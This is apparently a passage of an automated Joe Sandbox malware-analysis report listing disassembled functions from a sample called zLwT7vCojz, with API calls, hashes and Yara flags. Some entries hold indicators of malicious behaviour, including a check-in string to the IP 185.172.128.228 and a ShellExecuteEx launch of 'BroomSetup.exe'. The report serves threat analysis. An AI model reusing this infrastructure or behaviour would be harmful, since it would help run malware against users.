                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d182b465e3df3df7efeaa8add202c801fb9aa30faacca89b2e795b20c07713d1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD319571A00218AFDB219F5A9C819DEBBB8EB85315F1041ABFC14D7210DB749B81CB9C
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                                              • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                              • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                              • Opcode ID: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                              • Instruction ID: 2f9aa214828bd82a9e054f05166e7e476542bcb78e09976c20da0bbd603d2637
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0208322c849bd223be65c5dc220457c235287cfb99792f80a98781b5adf53624
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 120192B2A01525ABEB05DF98DE40BAEB7B9FF84714F10152AF805E7240D374BA51C7E1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog
                                                                                                                                                                                                                                              • String ID: /ping.php?substr=%s$185.172.128.228$Installed
                                                                                                                                                                                                                                              • API String ID: 3519838083-3380671521
                                                                                                                                                                                                                                              • Opcode ID: 921861a328e3f7d7c824c3837ef5087e2f64e12fe3abc36e80d027132d948a15
                                                                                                                                                                                                                                              • Instruction ID: 895aa7ca95bfe32917cece0cc4021e99c0fa9e15b4dc78af84e68f763d0dcda6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 921861a328e3f7d7c824c3837ef5087e2f64e12fe3abc36e80d027132d948a15
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E01A172A01114BBDB04AF89DC41BAEF769EF89315F10013FF805E3291D3789E4186E9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 04346509
                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 0434651D
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04346526
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                              • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                              • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                              • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                              • Instruction ID: ad8df09b97567641ce1559e0381a4e577256310c56b9c7d9f880ee9a6a22295c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1015A71E00218EBDB25DF69E9415DDBFB8EF48610F00812AE805A6260EB70A645CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                                              • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                              • Instruction ID: 8fb50d931e558b83608cc03759361b0958d6d423baf18f46befb7e1cf18fc5ac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38A19932E00B86AFEB29EF58C8807BEBBE4EF51355F1451ADF8949B241D238B941C750
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1036877536-0
                                                                                                                                                                                                                                              • Opcode ID: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                              • Instruction ID: 95edb75e536639b33972a857d440f8be94c0c6db010a7eda39038c13656bb89e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 557eb8767c00bad00038b2e5be713a3e80c22743073acb8fbc22b4e1da937f5c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FA11372A083869FDB218F18C8817EBBBF1EF55354F1541AEE4859B381C63C8D82C758
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                              • Opcode ID: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
                                                                                                                                                                                                                                              • Instruction ID: bbac62dcdca368132fbfd31d95e4b1b097745069759f2a03092cb8e8de116f2b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 963c7352d2e0a54c0d0f88c3f11fb2999fab24a43c9dca7c6f6700f89c7226dd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64413E71A005006BFB256FB89C44AEF7AE8EFC63B5F142295F424F61E0DA74B9405761
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                              • Opcode ID: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                              • Instruction ID: c8489a2078e21136fa723fa80d13f2eda68097992bc6546b806c704246c56682
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f01287b46ae53a51101a135f4392dfdbeaf8165ae30d8bdb7f55eb9fcaa53402
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE414C31B402217BDB306E7A9D41BAF3A64EF45374F54025BF818D6691DAFC8C9182AD
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,0042D740,00000000,00000000,8B56FF8B,04334002,?,00000004,00000001,0042D740,0000007F,?,8B56FF8B,00000001), ref: 0433B6DD
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0433B766
                                                                                                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0433B778
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0433B781
                                                                                                                                                                                                                                                • Part of subcall function 04337CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04337CDE
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2652629310-0
                                                                                                                                                                                                                                              • Opcode ID: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
                                                                                                                                                                                                                                              • Instruction ID: b5822c6eb095266251a77de62f11dd30dd0b9b5682c384f0a875b48da90c3d02
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 418993263a88c618d282e3586c2c640cbdd5746430a48a443b1d1fb7bcbd7a35
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1131B272A0021AABEF259F64CC85EAFBBA5EF40712F054168EC14DB151EB35FD54CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0432CF25
                                                                                                                                                                                                                                                • Part of subcall function 0432CE72: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0432CEA1
                                                                                                                                                                                                                                                • Part of subcall function 0432CE72: ___AdjustPointer.LIBCMT ref: 0432CEBC
                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0432CF3A
                                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0432CF4B
                                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0432CF73
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                                              • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                              • Instruction ID: d6c12b7279e8020a2e5e6019061b160f93dabd7c510a1439e055ed16961df072
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86012972100119BBEF126E95CE40DEF7B6AFF88758F046004FE4896120D732E861EBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0040CCBE
                                                                                                                                                                                                                                                • Part of subcall function 0040CC0B: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0040CC3A
                                                                                                                                                                                                                                                • Part of subcall function 0040CC0B: ___AdjustPointer.LIBCMT ref: 0040CC55
                                                                                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0040CCD3
                                                                                                                                                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 0040CCE4
                                                                                                                                                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0040CD0C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 737400349-0
                                                                                                                                                                                                                                              • Opcode ID: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                              • Instruction ID: 6cd8a4fdf9e309ef40a66346d060796d29459ceaa081db5c793327cde4683266
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 47db2c8148be1e88ced26f356c7ddfb08dca30c4f884cb2ff03c50df69916c0c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA012D72500108BBDF116F96CC81DEB3F69EF98758F044129FE0866261C73AE861DBA4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0432ED94,00000000,00000000,?,04337461,0432ED94,00000000,00000000,00000000,?,04337719,00000006,0042E2F8), ref: 043374EC
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,04337461,0432ED94,00000000,00000000,00000000,?,04337719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000,00000364,?,04337052), ref: 043374F8
                                                                                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04337461,0432ED94,00000000,00000000,00000000,?,04337719,00000006,0042E2F8,0042E2F0,0042E2F8,00000000), ref: 04337506
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                                                                                                              • Opcode ID: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                              • Instruction ID: f9ed76888fb2024472e1431e0db506d10ffc449e1e3b9e1a54d80a6cec207ad7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cfd02a50bf476b7c4f1bcf1e7d068622a64cc9e2d77f2ff3f9ca9aa917f168a2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F10147723426279BEB348F28AC44E5A3B98AF047A3751C534F906E3181EF20F801CAE4
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __startOneArgErrorHandling.LIBCMT ref: 004129CD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorHandling__start
                                                                                                                                                                                                                                              • String ID: pow
                                                                                                                                                                                                                                              • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                              • Opcode ID: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                              • Instruction ID: e0eefe9174cd7462181434ea84c362ca9420c476202b864f0baa4bab5f354a80
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0168bbcefadc1572663007d7dce21aba4256d125ab4b2ee182621d1a610e57aa
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D515DB1B5420196C7217B19CE813EB2B90EB40744F64496BE085C23E8EB7D8CE7DA4E
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0041DE54: GetOEMCP.KERNEL32(00000000,?,?,0041E0DD,?), ref: 0041DE7F
                                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0041E122,?,00000000), ref: 0041E2F5
                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,"A,?,?,?,0041E122,?,00000000), ref: 0041E308
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CodeInfoPageValid
                                                                                                                                                                                                                                              • String ID: "A
                                                                                                                                                                                                                                              • API String ID: 546120528-1838006985
                                                                                                                                                                                                                                              • Opcode ID: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                              • Instruction ID: 9adfac426f14955098f9a8953225ebda5108e0851b5f4a0d8690ab915da4ef9e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1283d02f46e1589de4851ffd21eb46f7b56e6e61e2be4b5569ea5d9b61fcf244
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1F511774A002499EDB208F36C8846FBBBE5EF51304F14446FD8A68B251D73D95C6CB99
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 043465C0
                                                                                                                                                                                                                                                • Part of subcall function 04324073: __EH_prolog.LIBCMT ref: 04324078
                                                                                                                                                                                                                                                • Part of subcall function 04324073: std::locale::_Init.LIBCPMT ref: 0432409A
                                                                                                                                                                                                                                              • _Deallocate.LIBCONCRT ref: 04346714
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: H_prolog$DeallocateInitstd::locale::_
                                                                                                                                                                                                                                              • String ID: hzB
                                                                                                                                                                                                                                              • API String ID: 2389838984-4102550090
                                                                                                                                                                                                                                              • Opcode ID: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
                                                                                                                                                                                                                                              • Instruction ID: 75661584aa6efebb2215b2d1d03167180ba9bfc05d55a0357c15a35c49d68f5e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bd51143135a8815fbe86bb61eaf86818a294b752ba5ce55ce2693886611e2087
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C251CC71A01258DFEB08DFA9C9909EDFBB5FF98304F64522EE405A7281D738AA45CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0041DF51
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Info
                                                                                                                                                                                                                                              • String ID: $^A
                                                                                                                                                                                                                                              • API String ID: 1807457897-1499568600
                                                                                                                                                                                                                                              • Opcode ID: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                              • Instruction ID: 9b2ab00e05afc5395f67001553a0f729d0bbf79a9b46b691f859092dfb419bf1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83da749ea859946a51b81c35361cbdd594582fb38d57894b34583c031ad0444d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46415CB49042589EDB218E25CC80BFABFE9DB49304F1404EEE58A87143D2799AC6CF64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 0432CA4A
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 0432CB03
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                                                              • API String ID: 3480331319-1018135373
                                                                                                                                                                                                                                              • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                              • Instruction ID: f7238f14ea0ae1a4c893d9cf08f78a5f8c26db38e2b2ebaac2ae694bf4e4edb3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED41D730E00228ABDF10DF68C984AAE7BB5EF45328F14A166E915AB391D731F905CBD0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,04340384,?,00000050,?,?,?,?,?), ref: 04340204
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                                              • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                              • Instruction ID: 534cab4940c4f7cd1ca0b20c5494377ffda440c26ba1072ab5755e4f4d0d9e9d
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2121606AB00205A6E7288E54CD41BE772FAAFD4B51F46A424EB2AE7540F736F9418250
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0042011D,?,00000050,?,?,?,?,?), ref: 0041FF9D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                                                                                                              • API String ID: 0-711371036
                                                                                                                                                                                                                                              • Opcode ID: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                              • Instruction ID: dacf84d8a1ebef4056087089fc013b288552bfb44d7b698df7e4a4e4da77cf20
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42f9bcd6f4e5afa2ede7f930f8a4cc0c89f81ec70c3ed948d7487cfdec4ae167
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F721F472B04101A6D7308B54D901BDBA3A6EB52B24F564077F90AC7301FBBADDCBC258
                                                                                                                                                                                                                                              Uniqueness

